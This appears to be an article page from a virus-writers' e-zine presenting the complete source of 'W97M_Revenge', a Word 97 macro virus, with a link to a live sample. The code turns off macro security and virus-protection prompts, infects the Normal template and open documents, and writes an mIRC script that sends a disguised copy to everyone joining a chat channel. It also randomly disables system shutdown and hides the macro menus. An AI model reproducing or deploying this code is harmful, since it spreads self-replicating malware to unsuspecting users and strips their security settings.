<html>
<head>
<title>rRlf #2</title>
</head>
<body text="#ffffff" link="#58b3f6" vlink="#58b3f6" alink="#58b3f6" background="background.jpg">
<center>
<img src="logo.jpg">
<br><i>Infiltration of a Nation</i>
<br><table cellpadding="9">
<tr>
<th><a href="24.html">last article</a></th>
<th><a href="01.html">table of contents</a></th>
<th><a href="26.html">next article</a></th>
</tr>
</table>
</center>
<p><b><u>W97M_Revenge by ppacket</u></b>
<p><u>file revenge.bas:</u>
<p>Attribute VB_Name = "revenge"
<br>Sub FileSave()
<br>On Error Resume Next
<p>System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1&
<p>With Options
<br>.VirusProtection = 0
<br>.SaveNormalPrompt = 0
<br>.ConfirmConversions = 0
<br>End With
<br>With Application
<br>.UserName = "pickpacket"
<br>.UserAddress = "rRlf;PVW"
<br>.UserInitials = "ppacket"
<br>End With
<p>Set NTx = NormalTemplate.VBProject.VBComponents
<br>Set ADx = ActiveDocument.VBProject.VBComponents
<br>&nbsp;
<br>&nbsp;
<br>&nbsp;&nbsp;&nbsp;&nbsp;If NTx.Item("revenge").Name <> "revenge" Then
<br>&nbsp;&nbsp;&nbsp;&nbsp;ADx("revenge").export "c:\ppacket.vxd"
<br>&nbsp;&nbsp;&nbsp;&nbsp;Nactive = True
<br>&nbsp;&nbsp;&nbsp;&nbsp;ElseIf ADx.Item("revenge").Name <> "revenge" Then
<br>&nbsp;&nbsp;&nbsp;&nbsp;NTx("revenge").export "c:\ppacket.vxd"
<br>&nbsp;&nbsp;&nbsp;&nbsp;Aactive = True
<br>&nbsp;&nbsp;&nbsp;&nbsp;End If
<br>&nbsp;
<br>&nbsp;&nbsp;&nbsp;&nbsp;If Nactive Then
<br>&nbsp;&nbsp;&nbsp;&nbsp;NTx.import "c:\ppacket.vxd"
<br>&nbsp;&nbsp;&nbsp;&nbsp;NormalTemplate.Save
<br>&nbsp;&nbsp;&nbsp;&nbsp;ElseIf Aactive Then
<br>&nbsp;&nbsp;&nbsp;&nbsp;ADx.import "c:\ppacket.vxd"
<br>&nbsp;&nbsp;&nbsp;&nbsp;ActiveDocument.Save
<br>&nbsp;&nbsp;&nbsp;&nbsp;End If
<p>father = Dir("c:\mirc\mirc.exe")
<br>If father <> "" Then
<p>worm = Dir("c:\mirc\downloads\father.txt.doc")
<br>If worm = "" Then
<br>wormfile = "c:\mirc\downloads\father.txt.doc"
<br>ActiveDocument.SaveAs "c:\mirc\downloads\father.txt.doc"
<br>Open "c:\mirc\script.ini" For Output As #1
<br>Print #1, "[script]"
<br>Print #1, ""
<br>Print #1, "n0=On Join:#:if ($me != $nick) then {/dcc send (" & wormfile & ")"
<br>Print #1, "n1=On Connect"
<br>Print #1, "n2=/clear"
<br>Print #1, "n3=/motd"
<br>Print #1, "n4=}"
<br>Close #1
<br>End If
<br>End If
<br>If Second(Now) = Int((Rnd * 60) + 1) Then
<br>Call revenge
<br>End If
<br>Dialogs(wdDialogFileSave).Show
<br>End Sub
<br>Sub revenge()
<br>On Error Resume Next
<p>System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer", "NoClose") = 1&
<br>MsgBox "This is a manifesto on my father as an asshole!!", vbInformation, "W97M_Revenge"
<br>End Sub
<p>Sub shadow()
<br>On Error Resume Next
<p>CommandBars("Tools").Controls("Macro").Enabled = False
<br>CommandBars("Tools").Controls("Customize...").Enabled = False
<br>CommandBars("Tools").Controls("Templates and Add-Ins...").Enabled = False
<br>CommandBars("Tools").Controls("Macro").Enabled = False
<br>CommandBars("Format").Controls("Style...").Enabled = False
<br>CommandBars("View").Controls("Toolbars").Enabled = False
<p>End Sub
<br>&nbsp;
<br>&nbsp;
<br><a href="25.zip">living virus</a>
</body>
</html>
